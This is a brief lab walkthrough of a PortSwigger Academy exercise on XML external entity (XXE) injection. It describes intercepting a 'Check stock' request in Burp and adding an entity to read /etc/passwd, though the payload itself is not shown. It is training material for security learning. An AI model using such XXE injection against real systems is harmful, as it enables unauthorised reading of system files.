Solving Portswigger Academy: Exploiting XXE using external entities to retrieve files
This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.
To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.
When you access the lab, you will see the below page.
The vulnerability is in check stock feature, so lets view details any application. When you clicked on view details, there is a Check Stock option.Click on it and see the request and response in burp.
It is clear the application is using XML to fetch number of units, we can use XXE payload to exploit this. Send the request in repeater and will add XXE payload just before the starting of the tag.
First we test it at Product ID and after that in Store ID.
I also tested it in store id, but it did not work.
This is how we solved the lab.
